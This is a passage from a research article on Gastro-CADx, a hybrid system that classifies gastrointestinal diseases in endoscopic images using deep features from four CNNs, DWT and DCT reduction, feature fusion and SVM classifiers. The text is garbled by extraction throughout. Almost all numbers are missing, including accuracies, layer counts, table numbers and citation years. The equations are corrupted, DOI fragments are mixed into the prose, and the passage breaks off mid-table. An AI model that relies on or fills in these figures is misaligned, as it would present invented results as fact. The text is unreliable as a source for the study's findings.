methods. therefore, we used these two new cnns architectures to test their performance and ability to classify multiple gi diseases from endoscopic images. the size of the input and output layers of the four networks employed used in the proposed method is shown in table . alexnet the structure of alexnet cnn was presented in by krizhevsky, sutskever & hinton ( ). this construction won the imagenet large-scale visual recognition challenge in . the structure of alexnet includes layers corresponding to convolutional layers, rectified linear unit (relu) layers, normalization layers, pooling layers, fc layers, a probabilistic layer using softmax units, and a classification layer ending in , neurons for , categories (attallah, sharkas & gadelkarim, ). darknet- darknet was first introduced in by redmon & farhadi ( ). darknet- is a cnn that is utilized as the spine of yolo-v . it commonly employs × filters and pairs figure image samples of hyperkvasir dataset. (a) bowel quality, (b) normal cecum, (c) dyed-lifted-polyp, (d) dyed-resection-margin, (e) esophagitis, (f) polyps, (g) polyrous, (h) retroflex stomach, (i) ulcerative-colitis, and (j) normal-z-line. full-size doi: . /peerj-cs. /fig- table a summary of the four cnns architectures. cnn structure number of layers size of input size of output alexnet × , resnet- × , darknet- × and densenet- × , attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the number of channels after each pooling stage. darknet- utilizes global average pooling to perform classifications in addition to × filters to reduce the feature demonstration between × convolutions. batch normalization is applied to regularize the classification model batch, make the training process more stable, and accelerate convergence. darknet- consists of convolutional layers and max-pooling layers. resnet- resnet architecture was first introduced in . the essential constructing block of the resnet is the residual block which was suggested by he et al. ( ). the residual block offers shortcuts associations within the convolution layers, which can assist the network to step some convolution layers at a time. in other words, the residual block recommends two choices, it may attain a set of functions on the input, or it can permit this stage. therefore, resnet construction is supposed to be more effective than other cnns such as alexnet and googlenet as stated in attallah, sharkas & gadelkarim ( ). in this study, resnet- is used which consists of convolutional layers and one fc layer. densenet- the latest research has revealed that cnns can be significantly deeper, more accurate, and effective to learn when they consist of smaller connections between layers near the input and those adjacent to the output. this finding motivated huang et al. ( ) to propose the dense convolutional network (densenet). densenet joins every layer to each other layer in a feed-forward manner. while conventional cnns with m layers have m connections—one amid every layer and its succeeding layer, densenet has m(m + )/ straight connections. for every layer, the feature-maps of all previous layers are utilized as inputs, and its feature-maps are utilized as inputs into all following layers. densenet has numerous benefits such as their ability to lessen the vanishing-gradient issue, reinforce feature dissemination, boost feature reprocesses, and considerably decrease the number of parameters. in this article, densenet- is used which has layers deep. proposed gastro-cadx an efficient hybrid cadx system called gastro-cadx is proposed to classify several gi classes from endoscopic images. gastro-cadx involves three steps including, the image preprocessing step, followed by feature extraction, reduction and fusion step, and finally a classification step. initially, several augmentation processes are utilized to raise the number of images in the datasets. also, images are resized. in the feature extraction, reduction, and fusion step, three stages are performed to construct gastro-cadx. in the first stage, valuable deep features are extracted from four cnns including (resnet- , alexnet, densenet- , and darknet- ). in the second stage, two handcrafted features are used to extract features from the spatial dl features extracted in the first stage. these handcrafted features are textural analysis based features representing temporal-frequency and spatial-frequency features. the dimension of these extracted features is reduced in this stage. afterward, is the third stage of the gastro-cadx, where several reduced features are fuzed in a concatenated manner. finally, is the classification step in which machine attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ learning classifiers are used to identify several gi classes. figure represents the block diagram of gastro-cadx. image preprocessing step the endoscopic images of both datasets are resized according to the size of the input layer of each cnn (attallah, ragab & sharkas, ) shown in table . subsequently, these frames are augmented. the augmentation process is essential to raise the number of images (attallah, sharkas & gadelkarim, ; ragab & attallah, ). this technique is performed because most likely the models which are learned with an insufficient quantity of frames may over-fit (ravì et al., ; attallah, sharkas & gadelkarim, ). the augmentation techniques utilized in this article to produce new endoscopic images from the training data are flipping, translation, transformation, and rotating (talo et al., ; attallah, ragab & sharkas, ). each frame is flipped and translated in x and y directions with pixel range (− , ) (attallah, ragab & sharkas, ). furthermore, each endoscopic image is rotated with an angle range ( – ) degrees (ragab & attallah, ). feature extraction, reduction, and fusion step gastro-cadx is based on three stages. the first stage is the dl feature extraction stage. the second is the handcrafted feature extraction and the reduction stage. finally is the third stage known as the fusion stage. deep learning feature extraction stage (first stage of gastro-cadx) pre-trained cnns trained using the endoscopic frames are used to accomplish feature extraction or classification processes. during the feature mining process, valuable dl features are mined from the cnns. instead of utilizing the cnns for classification, dl figure the block diagram of the proposed gastro-cadx. full-size doi: . /peerj-cs. /fig- attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ variables are pulled out from the fully connected layer called “fc ” as in attallah, ragab & sharkas ( ), the “global average pooling d layer” (fifth pooling layer), and the last average pooling layer of the alexnet, resnet- , darknet, and densenet constructions as in (ragab & attallah, ). the dl features size are , , , , or , and , for alexnet, resnet- , darknet- , and densenet- respectively. handcrafted feature extraction and reduction stage (second stage of gastro-cadx)hand- crafted feature extraction in this stage, time-frequency and spatial-frequency features based on textural analysis are determined from the dl features extracted in the previous stage. the textural features include the coefficients of the discrete wavelet transform (dwt) and the discrete cosine transform (dct). each feature method is discussed below. we employed dwt and dct as they are popular feature extraction method based on textural analysis. one of the main benefit of dct is its capability to spatially alter to characteristics of an image for instance discontinuities and changing frequency manner (bennet, arul ganaprakasam & arputharaj, ). it offers time-frequency representation of an image. also, dct has several advantages, first of all it prevents complicated calculation and presents simplicity of execution in practical purposes. furthermore, dct is capable of effectively managing the phase removing problem and demonstrates a powerful energy compaction estate (imtiaz & fattah, ; rashidi, fallah & towhidkhah, ). dwt and dct are the utmost common approach to extract textural features in the medical image processing area (lahmiri & boukadoum, ; srivastava & purwar, ; mishra et al., ; anthimopoulos et al., ; benhassine, boukaache & boudjehem, ). textural analysis based methods are useful in extracting texture features from images which is equivalent to simulating human visual learning procedure. it is widely used in medical image processing (attallah, ; lahmiri & boukadoum, ; anwar et al., ; castellano et al., ). � discrete wavelet transform (dwt) is a widely used feature extraction method. dwt examines both signals and images (lahmiri & boukadoum, ; srivastava & purwar, ). it offers a temporal-frequency representation of an image or signal through decomposing them with the help of a group of orthogonal basis functions (ortho-normal). images are of two dimensions; therefore -d dwt is used to decompose the image (attallah, sharkas & gadelkarim, ). one dimensional dwt is employed on each dl feature set distinctly which results in four groups of coefficients (ragab & attallah, ). the four groups generated after the -d dwt are known as three detail coefficients, cd , and approximation coefficients, ca . detail coefficients consist of the diagonal, vertical, and horizontal coefficients, correspondingly. � discrete cosine transform (dct) is frequently used to transform images into basic frequency components. it displays data as a sum of cosine functions oscillating at different frequencies (aydoğdu & ekinci, ). generally, the dct is applied to the imaged features to attain the dct coefficients. the dct coefficients are separated into three sets, known as low frequencies called (dc coefficients), middle frequencies, and high frequencies called (ac coefficients). high frequencies characterize noise and attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ small deviations (details). whereas, low frequencies are associated with the brightness conditions. on the other hand, middle frequencies coefficients comprise valuable information and build the basic assembly of the image. the dimension of the dct coefficient matrix is identical to the input dl featue (dabbaghchian, ghaemmaghami & aghagolzadeh, ).feature reduction feature reduction is an important procedure that is commonly used in the medical field to lower the huge dimension of the feature space. this reduction will correspondingly lead to a reduction in the complexity of the classification procedure (ragab & attallah, ), the training time of the model, and avoid overfitting (attallah et al., a; b). for this reason, dwt and dct have been employed as feature reduction procedures as well as feature extractors instead of directly using the large dimension of dl features generated in the previous step. therefore, a -level of dwt is applied to each dl features. the coefficients generated are are the approximation coefficients ca , and detail coefficients cd of the first decomposition level of dwt. these coefficients have half the dimension of the original dl feature dimension which enters the dwt process. by this way the dimension of feature space is reduced. the ca and cd coefficients are used separately to train the svm classifiers of the next step of gastro-cadx. the dct, on its own, does not reduce the data dimension; however, it shrinks most of the image information in a small number of coefficients (dabbaghchian, ghaemmaghami & aghagolzadeh, ). another reduction stage is usually executed to reduce the data dimension, where some of the coefficients are chosen to develop feature vectors. in this article, dct coefficients are generated using the zigzag procedure. after this reduction procedure, these coefficients are used separately to train the svm classifiers of the next step of gastro-cadx. feature fusion (third stage of gastro-cadx) the feature vectors generated for each of the dct and dwt coefficients are then fuzed in a concatenated manner to form different combinations of fuzed features sets which are then used to classify the svm classifiers in the next step of gastro-cadx. for dwt, initially, the ca coefficients extracted from the dl features for every two networks are fuzed. then, the ca coefficients extracted from the dl features of every three networks are fuzed. next, all ca coefficients extracted from dl features of the four networks are merged. the same procedure is done for the cd coefficients. for the dct, firstly the coefficients extracted from the dl features for every two networks are fuzed. then, the coefficients extracted from the dl features of every three networks are fuzed. finally, the dct coefficients extracted from dl features of the four cnns are merged classification step in this step, the classification procedure is performed using two scenarios either by an end-to-end dl (attallah, ragab & sharkas, ), techniques or by using the features extracted from the three stages of gastro-cadx. the scenarios resemble four experiments. the first scenario represents the use of the four cnns including alexnet, resnet- , darknet- , and densenet- as classifiers (end to end dl process). each pre-trained attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ cnn is created and learned distinctly and then used as a classifier. the first scenario represents experiment i. in the second scenario, the first stage of gastro-cadx is executed which corresponds to experiment ii, where the pre-trained cnns are applied to images, and then the dl features are extracted from each network individually. these dl features are used to learn distinct svm classifiers. these features represent spatial information only and of a huge dimension. therefore, in the second stage of gastro-cadx which corresponds to experiment iii, the dwt and the dct feature extraction methods are applied to dl features generated from each cnn of the first stage of gastro-cadx to extract temporal-frequency and spatial-frequency information. these features are utilized to train svm classifiers individually. the problem of dimensionality reduction is considered as well in the second stage of gastro-cadx, where a reduced set of coefficients are generated using the dwt and dct methods. these coefficients represent feature vectors that are used separately to learn three svm classifiers. finally, in the third stage of gastro-cadx, the reduced features are fuzed to form different combinations of fuzed features. these different combinations are used to construct several distinct svm classifiers the aim of this stage is to examine the influence of feature fusion on the classification accuracy and select the combination which has the highest impact on the performance of the gastro-cadx. this stage corresponds to experiment iv. figure summarizes the four experiments of gastro-cadx. note that the svm classifier was chosen as it is known to be a powerful classifier. it is considered to be one of the best methods in pattern classification and image classification (thai, hai & thuy, ). it performs well with large dimension space and of multi-class figure a summary of the four experiments of gastro-cadx. full-size doi: . /peerj-cs. /fig- attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ problems. as it uses kernel function which maps the feature space into new domain that can easily separate between classes of a dataset. therefore, it is commonly used with the huge dimension of dl features extracted from cnns (ragab et al., ; jadoon et al., ; zhang et al., ; das et al., ; xue et al., ; leng et al., ; wu et al., ; sampaio et al., ) achieving outperforming results. also, as you can see in table , that svm is the commonly used in the literature it can be observed that articles that used svm achieved the highest performance as khan et al. ( b) which achieved an accuracy of . %, (khan et al., a) achieving an accuracy of . %, (ghatwary, ye & zolgharni, ) obtaining an accuracy of %, (billah, waheed & rahman, ) achieving an accuracy of . % experimental setup several parameters are attuned after fine-tuning the fc layer of the cnns. the number of epochs and the initial learning rate for the four cnns are and − respectively as in (attallah, sharkas & gadelkarim, ). the mini-batch size and validation frequency are and . the weight decay and momentum are set to × − and . respectively. the optimization algorithm used is the stochastic gradient descent with momentum (sgdm). to measure the capacity of the gastro-cadx to classify several gi diseases, -fold cross-validation is engaged. this means that the gi datasets are divided into – % for training and validation. the svm classifiers are taught with folds and verified by the remaining fold. thus, the models are taught five times and the testing accuracy is calculated for each time then averaged. the kernel functions used for the svm classifier are linear, quadratic, and cubic. evaluation performance the presented gastro-cadx framework is evaluated with numerous measures for instance; f -score, precision, accuracy, sensitivity, and specificity. the formulas which are utilized in calculating such metrics are displayed below in eqs. ( )–( ) (attallah, ragab & sharkas, ). accuracy ¼ tp þ tn tn þ fp þ fn þ tp ( ) sensitivity ¼ tp tp þ fn ( ) specificity ¼ tn tn þ fp ( ) precision ¼ tp tp þ fp ( ) f � score ¼ � tp � tpð Þ þ fp þ fn ( ) where; is the total sum of gi images that are well classified to the gi class which they actually belongs to is known as tp, tn is the sum of gi images that do not belong to the gi attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ class intended to be classified, and truly do not belong to. for each class of gi, fp is the sum of all images that are classified as this gi class but they do not truly belong to. for each class of gi, fn is the entire sum of gi images that are not classified as this gi class. results the results of four experiments of gastro-cadx are presented in this section. experiment i is an end to end dl process where the four cnn are employed to perform classification. in experiment ii (first stage of gastro-cadx), dl features are extracted from the four cnns and used to train distinct svm classifiers. experiment iii (second stage of gastro-cadx) represents the use of the second stage of feature extraction and reduction methods which employs dct and dwt to extract temporal-frequency and spatial-frequency information from the images. in this experiment, reduced coefficients generated from dwt and dct methods are employed to train svm classifiers. in experiment iv, different combinations of fuzed features are generated and utilized to inspect the effect of feature combination on gastro-cadx performance. experiment i results the results of the end-to-end dl procedure employed for classification are illustrated in tables and for dataset i and dataset ii respectively. table shows that the highest accuracy of . % is achieved by resnet- followed by an accuracy of . %, . %, . % attained by darknet- , densenet- , and alexnet respectively for dataset i. table demonstrates that the peak accuracy of . % is achieved by resnet- followed by an accuracy of . %, . %, . % attained by darknet- , densenet- , and alexnet respectively for dataset ii. experiment ii results this experiment represents the first stage of gastro-cadx. the results of this experiment are shown in figs. and for dataset i and dataset ii respectively. figure indicates the table the classification accuracy for the four cnns used in gastro-cadx using dataset i. cnn accuracy (%) alexnet . resnet- . darknet- . densenet- . table the classification accuracy for the four cnns used in gastro-cadx using dataset ii. cnn accuracy (%) alexnet . resnet- . darknet- . densenet- . attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ maximum accuracies of . % and . % are attained by darknet- using linear and quadratic svm classifiers using dataset i. subsequently, resnet- features achieve an accuracy of . %, . %, and . % using linear, quadratic, and cubic svm classifiers respectively. following, alexnet and densenet- features obtain an accuracy of . %, %, . %, and %, . %, . % for using linear, quadratic, and cubic svm classifiers respectively. figure shows the peak accuracies of . %, . %, . % are achieved by resnet- using linear, quadratic, and cubic svm classifiers constructed with dataset ii. next, darknet features attain an accuracy of . %, %, and . % using linear, quadratic, and cubic svm classifiers respectively. following, alexnet and densenet- features obtain an accuracy of . %, . %, . % and . %, . %, . % for using linear, quadratic, and cubic svm classifiers respectively. experiment iii results this experiment represents the second stage of gastro-cadx. the results of this experiment are shown in figs. – for dataset i and figs. – for dataset ii. figure shows the classification accuracy for the three svm classifiers constructed with ca and cd coefficients of dwt, besides the dct coefficients extracted from the resnet- cnn using dataset i. the figure indicates that the peak accuracy of . % is achieved using the dct coefficients with linear svm. almost the same accuracy of . % is attained using the ca coefficients of dwt. figure demonstrates the classification accuracy for the three svm classifiers built with ca and cd coefficients of dwt, in addition to the dct coefficients extracted from alexnet cnn using dataset i. the figure specifies that the highest accuracy of . % is accomplished using the cd coefficients of dwt with a quadratic svm classifier. a slightly lower accuracy of . % is attained using the ca coefficients of dwt. figure experiment ii—accuracy of each dl features extracted from the four cnns of gastro- cadx constructed using dataset i. full-size doi: . /peerj-cs. /fig- attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure displays the classification accuracy for the three svm classifiers constructed with ca and cd coefficients of dwt, as well as the , dct coefficients extracted from densenet cnn using dataset i. the figure identifies that the highest accuracy of . % is accomplished using the ca coefficients of dwt with a cubic svm classifier. a lower accuracy of . % is reached using the ca coefficients of dwt with a linear svm classifier. figure experiment ii—accuracy of each dl features extracted from the four cnns of gastro- cadx constructed using dataset ii. full-size doi: . /peerj-cs. /fig- figure experiment iii—accuracy of each dct and dwt features extracted from the resnet- cnn of gastro-cadx constructed using dataset i. full-size doi: . /peerj-cs. /fig- attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure shows the classification accuracy for the three svm classifiers created with the ca and cd coefficients of dwt, besides the dct coefficients extracted from darknet- cnn using dataset i. note that, since the number of dl features extracted from darknet- was only (which is already a small dimension of features), all the dct coefficients are used in this experiment without the need of the zigzag scanning procedure. the figure indicates that the highest accuracy of . % is accomplished using the dct coefficients with linear svm. figure experiment iii—accuracy of each dct and dwt features extracted from the alexnet cnn of gastro-cadx constructed using dataset i. full-size doi: . /peerj-cs. /fig- figure experiment iii—accuracy of each dct and dwt features extracted from the densenet- cnn of gastro-cadx constructed using dataset i. full-size doi: . /peerj-cs. /fig- attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure shows the classification accuracy for the three svm classifiers constructed with ca and cd coefficients of dwt, besides the dct coefficients extracted from the resnet- cnn using dataset ii. the figure indicates that the peak accuracy of . % is achieved using the ca coefficients with linear, cubic, and quadratic svm. almost the same accuracy of . % is attained using the cd coefficients of dwt with linear, cubic, and quadratic svm and the dct coefficient with linear svm. figure experiment iii—accuracy of each dct and dwt features extracted from the darknet cnn of gastro-cadx constructed using dataset i. full-size doi: . /peerj-cs. /fig- figure experiment iii—accuracy of each dct and dwt features extracted from the resnet- cnn of gastro-cadx constructed using dataset ii. full-size doi: . /peerj-cs. /fig- attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure reveals the classification accuracy for the three svm classifiers learned with ca and cd coefficients of dwt, besides the dct coefficients extracted from alexnet cnn using dataset ii. the figure specifies that the highest accuracy of . % is accomplished using the ca coefficients of dwt with a quadratic svm classifier. a slightly lower accuracy of . % is attained using the cd coefficients of dwt with quadratic svm. figure indicates the classification accuracy for the three svm classifiers built with ca and cd coefficients of dwt, besides the , dct coefficients extracted from figure experiment iii—accuracy of each dct and dwt features extracted from the alexnet cnn of gastro-cadx constructed using dataset ii. full-size doi: . /peerj-cs. /fig- figure experiment iii—accuracy of each dct and dwt features extracted from the densenet- cnn of gastro-cadx constructed using dataset ii.full-size doi: . /peerj-cs. /fig- attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ densenet cnn using dataset ii. the figure identifies that the highest accuracy of . % is accomplished using the ca coefficients of dwt with cubic and quadratic svm classifiers. the same accuracy is reached using the cd coefficients of dwt with a quadratic svm classifier. figure demonstrates the classification accuracy for the three svm classifiers constructed with ca and cd coefficients of dwt, in addition to the dct coefficients extracted from darknet- cnn using dataset ii. as the number of dl features mined from darknet- was only in the case of dataset ii (which is already a small dimension of features), all the dct coefficients are employed in this experiment without the necessity of the zigzag scanning process. the figure specifies that the peak accuracy of . % is obtained using the dct coefficients with linear svm. experiment iv results this experiment represents the third stage of gastro-cadx. this experiment aims to explore the effect of combining features on the cadx’s performance. moreover, to search for the best combination of fuzed feature set which has the highest influence on the classification accuracy. to form the fuzed feature sets, firstly for dwt, the cd coefficients extracted from the dl features for every two cnns are fuzed. next, the cd coefficients extracted from the dl features of each three cnns are merged. afterward, all cd coefficients extracted from the dl features of the four cnns are combined. a similar fusion process is executed for the ca coefficients. for dct, initially, the coefficients extracted from the dl features for every two cnns are fuzed. afterward, the dct coefficients extracted from the dl featured of each three cnns are fuzed. next, the coefficients extracted from dl images of the four cnns are merged. figure experiment iii—accuracy of each dct and dwt features extracted from the darknet- cnn of gastro-cadx constructed using dataset ii. full-size doi: . /peerj-cs. /fig- attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table displays a comparison between classification accuracy achieved using ca and cd features extracted from different combinations of the dl features generated from the four cnns employed in gastro-cadx using dataset i. this comparison shows the ca features has slightly higher accuracy than cd features for all combination of fuzed features except for alexnet+resnet and alexnet+densenet. the maximum performance (written in bold) is achieved using ca and cd features extracted using the fusion of alexnet+resnet+densenet cnns, where the highest accuracy of . % is attained using ca features extracted using alexnet+resnet+densenet cnns with both quadratic and cubic svm. on the other hand, table presents a comparison between classification accuracy accomplished using dct features extracted from different combinations of the dl variables produced from the four cnns employed in gastro-cadx using dataset i. table the classification accuracy (%) for the ca and cd features of dwt extracted from different combination of cnns used in gastro-cadx using dataset i. features ca cd linear quadratic cubic linear quadratic cubic resnet+darknet . . . alexnet+darknet . . . . . . densenet+darknet . . . . . . alexnet+resnet . . . . . . alexnet+densenet . . . . resnet+densenet . . . . . . alexnet+resnet+densenet . . . . . . alexnet+resnet+darknet . . . . . . alexnet+densenet+darknet . . . . . . resnet+densenet+darknet . . . . . . alexnet+resnet+densenet+darknet . . . . . table the classification accuracy (%) for the dct features extracted from different combination of cnns used in gastro-cadx using dataset i. features linear quadratic cubic resnet+darknet . alexnet+darknet . densenet+darknet . . . alexnet+resnet . . . alexnet+densenet . . . resnet+densenet . . . alexnet+resnet+darknet . . . alexnet+ densenet +darknet . . resnet +densenet+darknet . . . alexnet+resnet+densenet . . alexnet+resnet+densenet+darknet . . . attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ this comparison indicates the maximum performance (written in bold) is achieved using dct features extracted using alexnet+resnet+densenet+darknet cnns, where the highest accuracy of . % is attained using features extracted using alexnet+resnet +densenet+darknet cnns with both quadratic and cubic svm. table demonstrates a comparison between the classification accuracy accomplished using ca and cd features extracted from different combinations of the dl variables produced from the four cnns using dataset ii. this comparison indicates the ca features has slightly higher accuracy than cd features for all combinations of fuzed features except for alexnet+resnet and alexnet+densenet. the peak performance (written in bold) is achieved using ca and cd features extracted using alexnet+resnet+densenet cnns, where the maximum accuracy of . % is reached using ca features extracted using alexnet+resnet+densenet cnns using cubic svm. in contrast, table shows a comparison between classification accuracy accomplished using dct features extracted from different combinations of the dl variables generated from the four cnns employed in gastro-cadx using dataset ii. this comparison specifies the maximum accuracy (written in bold) is achieved using dct features extracted using alexnet +resnet+densenet cnns and alexnet+ resnet+densenet+darknet cnns, where the highest accuracy of . % is attained using linear, quadratic, and cubic svm classifiers. table shows the performance metrics for cubic svm classifiers trained with the fuzed ca features extracted from alexnet+resnet+densenet cnns using dataset i and dataset ii. the results of table indicate that the specificity of . and . , sensitivity of . and . , precision of . and . , and f score of . and . are obtained for dataset i and dataset ii respectively table the classification accuracy (%) for the ca and cd features of dwt extracted from different combination of cnns used in gastro-cadx using dataset ii. features ca cd linear quadratic cubic linear quadratic cubic resnet+darknet . . . . . . alexnet+darknet . . . . . . densenet+darknet . . . . . . alexnet+resnet . . . alexnet+densenet . . . . resnet+densenet . . . . alexnet+resnet +densenet . . . . . . alexnet+resnet+darknet . . . . . . alexnet+densenet+darknet . . . . . . resnet+densenet+darknet . . . . alexnet+resnet+densenet+darknet . . . . . . attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ discussion the manual diagnosis of gi diseases with a huge number of endoscopic images is very challenging and time-consuming. besides, at times the image containing the abnormality can be simply unobserved by the medical expert which can lead to misdiagnosis. therefore, there is an essential need for automatic systems that have the capability to automatically identify possible anomalies by analyzing the entire endoscopic images (aoki et al., ). nowadays, with the current development of dl and imaging processing technologies, cadx systems have been frequently used to help gastroenterologists in automatically examining endoscopic images and recognizing the gi disease (khan et al., b). in this study, an automatic cadx system called gastro-cadx is proposed. the proposed cadx involves three steps including the image preprocessing step, followed by the feature extraction, reduction, and fusion step, and finally the classification step. primary the endoscopic images were augmented. next, is the feature extraction, reduction, and fusion step. which presents the three stages of gastro-cadx. in the first stage of gastro-cadx, four spatial valuable dl features were extracted from the four cnns and used to train svm classifiers. next, in the second stage of gastro-cadx, dct, and dwt feature extraction methods were employed to extract temporal-frequency and spatial-frequency features. these methods were used for feature reduction as well. these extracted features are utilized table the classification accuracy (%) for the dct features extracted from different combination of cnns used in gastro-cadx using dataset ii. features linear quadratic cubic resnet+darknet . . . alexnet+darknet . . densenet+darknet . . alexnet+resnet . . . alexnet+densenet . . . resnet +densenet . . . alexnet+resnet+darknet . . alexnet+densenet+darknet . . . resnet +densenet+darknet . . . alexnet+resnet +densenet . . . alexnet+resnet +densenet+darknet . . . table the performance metrics for the ca features of dwt extracted from alexnet+resnet +densenet cnns using dataset i and ii. specificity sensitivity precision f score dataset i cubic svm . . . . dataset ii cubic svm . . . . attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ to construct the svm classifiers. finally, in the third stage of gastro-cadx, the coefficients of the dct and dwt were fuzed to form different combinations of fuzed feature sets. this stage examined the influence of fuzing features on the performance of the cadx. besides, the third stage of gastro-cadx searched for the greatest mixture of features that influenced gastro-cadx’s performance. two datasets, namely dataset i and dataset ii were used to evaluate the performance of the proposed gastro-cadx. the first stage of gastro-cadx is compared with the end-to-end dl cnns of experiment i and the results are shown in tables for dataset i and ii. it can be observed from table that the first stage of gastro-cadx has higher accuracies compared to the end-to-end cnns constructed in experiment i for both datasets. the highest accuracy achieved in the first stage of gastro-cadx is . % using linear svm trained with darknet- features for dataset i (written in bold). whereas, for dataset ii, the peak accuracy attained in the first stage of gastro-cadx is . % using linear svm trained with darknet- features. it was found that most of the previous studies directly used spatial dl features to perform the classification, however in the article we tried extracting spatial-temporal- frequency dl features using dwt and spatial-frequency dl features using dct to examine their influence on the classification performance of gastro-cadx (stage two of gastro-cadx). dct and dct was also performed to reduce the huge dimension of the dl spatial features. it is proved from fig. , that for dataset i, stage two has enhanced the classification performance with reduced feature set, while for dataset ii it attained the same accuracy but with lower feature dimension. the second stage of gastro-cadx has reduced the features extracted from the first stage of gastro-cadx with almost the same accuracy but with fewer feature dimensional space for dataset i and dataset ii. the highest accuracy of . % of the second stage of gastro-cadx for dataset i was obtained using linear svm classifier trained with the dct coefficients extracted from deep learning features of darknet- cnn. whereas, for dataset ii, the peak accuracy of . % table the classification accuracy (%) for the first stage of gastro-cadx compared to experiment i (end-to-end classifiction process) using dataset i and ii. cnn experiment i (end to end) first stage of gastro-cadx linear quadratic cubic dataset i alexnet . . . resnet- . . . . darknet- . . . . densenet- . . . dataset ii alexnet . . . . resnet- . . . . darknet- . . . densenet- . . . . attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ is achieved using linear svm classifier trained with the ca coefficients extracted from deep learning features of resnet- cnn. on the other hand, the third stage of gastro-cadx has further enhancement on the classification accuracy of gastro-cadx as shown in fig. for dataset i and dataset ii. figure shows the highest classification accuracy achieved using each stage of gastro-cadx for dataset i and ii respectively. it can be noticed from the third stage of gastro-cadx (experiment iv) that the fusion of dct and dwt of darknet and densenet cnns yielded the worst accuracy of around – % for both dataset i and dataset ii. whereas, the highest accuracy of . % and . % is achieved using cubic svm classifier trained with the fuzed ca coefficients extracted using deep learning features of alexnet+resnet+desnenet for dataset i and dataset ii respectively. in order to make a fair comparison regarding the computational time with other related studies, we both should use the same platform and environment like using the same processor and video controller and other specifications which can vary the computational time. since, this is very hard to be accomplished as an alternative, we compared the computational cost of the proposed gastro-cadx with resnet cnn (end-to-end deep learning techniques) which is widely used in the literature and achieved the highest accuracy using both dataset i and dataset ii as shown in table . this comparison is shown in table which compares both the classification accuracy and training time of resnet cnn using end-to-end procedure with gastro-cadx. table proves that gastro-cadx has much lower computation time than resnet (end-end classification) while attaining higher accuracy for both datasets. this is because the computation time for resnet is , s and , s for dataset i and ii respectively which is much higher than the s and s achieved by gastro-cadx. also, the accuracy for resnet is . % and . % for figure a comparison between the highest accuracy attained from the three stage of gasto-cadx using dataset i and ii. full-size doi: . /peerj-cs. /fig- attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ dataset i and ii respectively which is much higher than the . % and . % obtained by gastro-cadx note that we also searched related studies to see if the authors have mentioned the computational time of their proposed methods, but unfortunately this information was missing. all experiments are done with matlab a. the processor used is intel(r) core(tm) i - hq, cpu @ . ghz . ghz, ram gb, and -bit operating system. the video controller is nvidia geforce gtx . a comparison is made to compare the performance of gastro-cad with the latest relevant work that used dataset i. the results of this assessment are displayed in table . table results prove the competence of gastro-cadx compared to other previous related studies. gastro-cadx proposed in this article appears to perform well on all of the metrics provided in table . gastro-cadx outperformed the systems presented by ahmad et al. ( ), pogorelov et al. ( ) (first method), owais et al. ( ), as they used only spatial information extracted and from one or two cnn. the proposed system also outperformed (pogorelov et al., ; nadeem et al., ) as they used only handcrafted global features and did not benefit from using the spatial information of features extracted with dl techniques. although, agrawal et al. ( ) combined dl features with handcrafted global features, yet their performance is lower than table computation time and accuracy acheived using gastro-cadx compared to resnet end-to- end deep learning method. method dataset i dataset ii training time (s) accuracy (%) training time (s) accuracy (%) resnet (end-to end) , . , . gastro-cadx . . table comparisons with recent related studies based on dataset i. article method performance metrics accuracy (%) sensitivity precision specificity f score ahmad et al. ( ) alexnet . – – – – agrawal et al. ( ) gf +inception v +vgg+svm . . . . . pogorelov et al. ( ) resnet+lmt . . . . . pogorelov et al. ( ) gf+decision tree . . . . . pogorelov et al. ( ) gf+random forest . . . . . nadeem et al. ( ) 